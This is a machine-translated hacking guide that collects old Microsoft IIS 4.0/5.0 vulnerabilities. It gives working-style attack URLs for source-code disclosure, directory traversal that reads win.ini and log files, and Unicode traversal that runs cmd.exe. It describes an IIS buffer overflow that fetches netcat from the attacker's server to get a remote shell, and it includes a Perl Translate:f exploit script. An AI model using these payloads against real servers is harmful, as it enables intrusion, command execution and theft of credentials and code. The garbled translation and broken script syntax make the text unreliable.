IIS Vulnerability Consolidation Encyclopedia _ Vulnerability Research

The vulnerabilities of IIS in the second half of last year are endless, given the current widespread use of IIS, it is necessary to summarize the information collected.

1. Introduced


The method described here is mainly done through Port 80来, which is very threatening because it is always open as a network server 80 ports. If you want to facilitate some, download some www, CGI scanners to assist the inspection.
And to know what service program the target machine is running, you can use the following command:
Telnet < target machine > 80
Get head/http/1.0
You can return some domain names and Web service versions, and if some servers run the Web service at the 8080,81,8000,8001 port, you telnet to the corresponding port.


2. Common Vulnerabilities

(1), NULL.HTW
If IIS runs the index
The server contains an NULL.HTW-related vulnerability that does not exist on the server at the end of this. htw file. This vulnerability will cause the source code of the ASP script to be displayed.
Global.asa contains sensitive information such as user accounts. If an attacker provides a special URL request to IIS, it can jump out of the virtual directory limit and access the logical partition and root directory. And this "hit-highlighting" function in index
The server does not adequately prevent requests for various types of files, so it causes an attacker to access arbitrary files on the server. The NULL.HTW feature can get 3 variables from user input:
CiWebHitsFile
Cirestriction
Cihilitetype
You can pass variables to obtain source code such as Default.asp in the following ways:
http://www. Target machine. com/null.htw? Ciwebhitsfile=/default.asp &
Cirestriction=none & &cihilitetype=full There is no need for a legitimate. htw file because the virtual file is already stored in memory.

(2), mdac-execute local Command vulnerability
This vulnerability appears early, but globally, there may be a lot more IIS
The Web server has this vulnerability, just as there are many people using Windows3.2 today. There is a vulnerability in the MDAC component of IIS that could cause an attacker to remotely execute commands on the target system. The main core issue is the presence of rdsdatafactory, which, by default, allows remote commands to be sent to the IIS server, which runs as a device user and by default is the system user. We can test the existence of this vulnerability in the following ways:
C:\&GT;NC-NW-W 2 < target machine > 80
Get/msadc/msadcs.dll HTTP
If you get the following information:
Application/x_varg
There is a good chance that this vulnerability is not patched and you can use rain forest
The puppy website's two programs are measured (WWW.WIRETRIP.NET/RFP) ==>mdac.pl and msadc2.pl.

(3), ASP Dot Bug
This vulnerability appears earlier, is the LOPHT team found in 1997, the flaw is also leaking ASP source code to the attacker, generally on the IIS3.0 on this vulnerability, the URL at the end of the request to append one or more points to reveal the ASP source code. http://www. Target machine. com/sample.asp.

(4), IDC & Ida Bugs
This vulnerability is actually similar to ASP dot
vulnerability, which can display its web directory information on IIS4.0, it is strange that some people have found such vulnerabilities on IIS5.0, by adding IDC or Ida? The suffix to the URL causes IIS to try to allow the database to connect to the program. dll to run. IDC, if this. IDC does not exist, it returns some information to the client.
http://www. Target machine. COM/ANYTHING.IDC or ANYTHING.IDQ.

(5), +.htr Bug
This vulnerability was discovered by NSFocus, and additional +.HTR URL requests to some ASA and ASP would result in the disclosure of File source code:
http://www. Target machine. com/global.asa+.htr

(6), NT Site Server adsamples Vulnerability
By requesting SITE.CSC, which is typically stored in/ADSAMPLES/CONFIG/SITE.CSC, an attacker may obtain some information such as Dsn,uid and pass in a database, such as:
http://www. Target machine. COM/ADSAMPLES/CONFIG/SITE.CSC

(7), IIS HACK
A IIS4.0 buffer overflow vulnerability was found to allow users to upload programs, such as uploading netcat to the target server and binding cmd.exe to port 80. This buffer overflow exists primarily in the. htr,.idc and. stm files, and its URL requests for these files do not have a full boundary check on the name, causing the attacker to insert some backdoor programs to download and execute programs on the system. To detect such a site you need two files Iishack.exe,ncx.exe, you can go to the site www.technotronic.com to download, in addition you need a Web server, you can also be a virtual server oh. You now run the Web service program on your own Web server and put the Ncx.exe in your own directory, and then use Iishack.exe to check the target machine:
C:\>iishack.exe < target machine >-< your Web server >/ncx.exe
Then you use Netcat to connect to the server you are testing:
C:\&GT;NC < target machine > 80
If the overflow point is correct, you can see the command line prompt for the target machine, and it is remote admin permissions. CodeBrws.asp
& Showcode.asp
。 CodeBrws.asp and Showcode.asp are included with the file-viewing program in IIS4.0, but are not installed by default, and this viewer is installed with the administrator allowed to view the sample files as a contact. However, this viewer does not properly limit the files that are accessed, and remote attackers can exploit this vulnerability to view arbitrary file contents on the target machine, but note the following:
1. CodeBrws.asp and showcode.asp are not installed by default.
2. Vulnerability only allows viewing of file contents.
3. This vulnerability cannot bypass Windows NT's ACL control list restrictions.
4. Only allow files under the same partition to be viewed (so installing IIS directories and Winnt partitions is a good idea, which may also be a better way to prevent the latest IIS5.0 Unicode vulnerabilities).
5, the attacker would need to know the file name of the request.
For example, if you find that the file exists and meet the above requirements, you may request the following:
http://www. Target machine. com/iisamples/exair/howitworks/codebrws.asp?source=/
Iisamples/exair/howitworks/codebrws.asp
You will be able to view the source code of the codebrws.asp.
You can also use Showcode.asp to view files:
http://www. Target machine. com/msadc/samples/selector/showcode.asp?
source=/msadc/.. /.. /.. /.. /.. /winnt/win.ini
Of course, you can also view some FTP information to get other target administrators often use the machine, and perhaps other machines are less secure than the Web server, such as:
Http://xxx.xxx.xxx.xxx/msadc/Samples/SELECTOR/showcode.asp?
Source=/msadc/samples/.. /.. /.. /.. /.. /winnt/system32/logfiles/msftpsvc1/ex000517.log

(8), Webhits.dll & HTW
This hit-highligting function is made by index
Server provides an entry that allows a Web user to highlighted (highlight) its original search on a document. The name of this document is passed to the. htw file through the variable ciwebhitsfile, Webhits.dll is an ISAPI application to process the request, open the file and return the result, and when the user controls the CiWebHitsFile parameters passed to the. HTW, they can request arbitrary files, resulting in You can view ASP source code and other script file contents. To see if you have this vulnerability, you can request the following entry:
http://www. Target machine. com/nosuchfile.htw
If you get the following information from the server side:
The format of the query_string is invalid
This means that you have this loophole.
The main problem is that Webhits.dll is associated with the mapping of the. htw file, so you can avoid the vulnerability by simply canceling the mapping, and you can search for the. htw file in the system you think is vulnerable, and you will find the following procedure:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/ISSHELP/ISS/MISC/IIRTURNH.HTW (this is generally used for loopback)
An attacker could use the following methods to access the contents of a file in the system:
http://www. Target machine. com/iissamples/issamples/oop/qfullhit.htw?
ciwebhitsfile=/.. /.. /winnt/win.ini&cirestriction=none&cihilitetype=full
The contents of the file will be Win.ini in the system with this vulnerability.
(9), ASP alternate Data Streams (:: $DATA)
$DATA This vulnerability was released in the middle of 1998, $DATA is stored in the file in the NTFS file system main
Data
Stream property, it is possible to use IIS to access the data stream in the browser by creating a URL of a special format, which also shows the file code in which these data
Stream (data flow) and any files that contain the data code.
This vulnerability requires a few of the following limitations, one is to show that the file needs to be saved in the NTFS file partition (fortunately for the "security" many servers are formatted with NTFS), and the second is that the file needs to be ACL set to global readable. and unauthorized users need to know the name of the file name to see, WIN
IIS1.0 in NT, 2.0,
This problem exists in both 3.0 and 4.0. Microsoft offers a IIS3.0 and 4.0 version of the patch,
To view the contents of some. asp files, you can request the following URL:
http://www. Target machine. Com/default.asp:: $DATA
You get the source code. To understand the data flow problem in the NTFS file system, you might want to read this article:
Http://focus.silversand.net/newsite/skill/ntfs.txt

(10), ISM. DLL Buffering Truncation Vulnerability
This vulnerability exists in IIS4.0 and 5.0, allowing attackers to view arbitrary file content and source code. Through the file
Add nearly 230 + or?? (these represent spaces) and append?. HTR's special request to IIS, which causes IIS to assume that the client is requesting the?. HTR file, and the suffix of the. htr file is mapped to ISM.DLL
ISAPI application so that IIS transfers this. htr request to this DLL file, and then the ISM.DLL program opens and executes the passed file, but in ISM.DLL
The buffer sends a disconnected before the message is truncated. Htr
And it will be delayed for some time to return some of the files you want to open. But be aware that unless the WEB
The service is stopped and restarted, or the attack can only be executed once. If one has already been sent. htr
Request to the machine, then the attack will fail. It can only be in the ISM. The DLL works the first time it is loaded into memory.
http://www. Target machine. Com/global.asa (... <=230) global.asa.htr

(11), the existence of some violence to crack the threat. HTR program
A serious vulnerability in IIS4.0 is allowing a remote user to attack a user account on a Web server, where your Web server converts addresses through NAT and can be attacked. Each IIS4.0 is installed with a virtual directory/iisadmpwd, which contains multiple. htr files that anonymous users are allowed to access, which just don't have the rules to limit the loopback
Addr (127.0.0.1), request these files to jump out of the dialog box to allow you to modify the user's account and password through the web. This directory is physically mapped in the following directory:
C:\winnt\system32\inetsrv\iisadmpwd
Achg.htr
Aexp.htr
Aexp2.htr
Aexp2b.htr
Aexp3.htr
Aexp4.htr
Aexp4b.htr
Anot.htr
Anot3.htr
In this way, attackers can use brute force to guess your password. If you are not using this service, please delete this directory immediately.

(12), Translate:f Bug
This vulnerability was posted on August 15, 2000 (www.securityfocus.com/bid/1578), and the problem is the presence of office
2000 and FrontPage 2000Server
In WebDAV in extensions, when someone requests a asp/asa other arbitrary script on the HTTP
Get plus translate:f suffix, and after the request file Plus/will display the file code, of course, in no dozen Win2K
SP1 patches as a prerequisite. This is a W2K loophole, but since FP2000 is also installed on IIS4.0, so there is a flaw in IIS4.0, you can use the following script to exploit this vulnerability:
#############################
Use Io::socket; #
My ($port, $sock, $server); #
$size = 0; #
#############################
#
$server = "$ARGV [0]";
$s = "$server";
$port = "80";
$CM = "$ARGV [1]";
&connect;
Sub Connect {
if ($ #ARGV < 1) {
Howto ();
Exit
}
$ver = "get/$cm \ http/1.0
Host: $server
Accept: */*
Translate:f
\ n ';
My ($iaddr, $paddr, $proto);
$IADDR = Inet_aton ($server) | | Die "Error: $!";
$PADDR = sockaddr_in ($port, $iaddr) | | Die "Error: $!";
$proto = Getprotobyname (' tcp ') | | Die "Error: $!";
Sockets (sock, Pf_inet, Sock_stream, $proto) | | Die "Error:
$!";
Connect (sock, $paddr) | | Die "Error: $!";
Send (sock, $ver, 0) | | Die "Can ' t to send packet: $!";
Open (out, "> $server. txt");
Print "dumping $cm to $server. txt \ n";
while () {
Print out;
}
Sub Howto {
Print "type as follows:Trans.pl www. target machine. com codetoview.asp \ n";
}
Close out;
$n = 0;
$type = 2;
Close (sock);
Exit (1);
}

You can use the following method to obtain the source code:
trasn.pl www. target machine. com default.asp

(13), IIS exists Unicode resolution error Vulnerability
NSFocus Security Team found Microsoft IIS 4.0 and IIS
5.0 a security vulnerability exists in the implementation of Unicode character decoding, resulting in the user being able to execute arbitrary commands remotely through IIS. When IIS opens a file, it decodes the file name if it contains Unicode characters, and if the user provides some special encoding, it will cause IIS to open incorrectly or to execute files other than the Web root directory.
You can use the following method to exploit this vulnerability:
(1)
If the system contains an executable directory, arbitrary system commands may be executed. The following URL may list the contents of the current directory:
http://www. Target machine. com/scripts/. Á.. /winnt/system32/cmd.exe?/c+dir
(2) It is possible to use this vulnerability to view the contents of a system file:

http://www. Target machine. com/a.asp/. Á.. /.. Á.. /winnt/win.ini
This loophole is for Chinese operating platform, you can also use "À¯" or "áœ" to test English version, because the coding is different.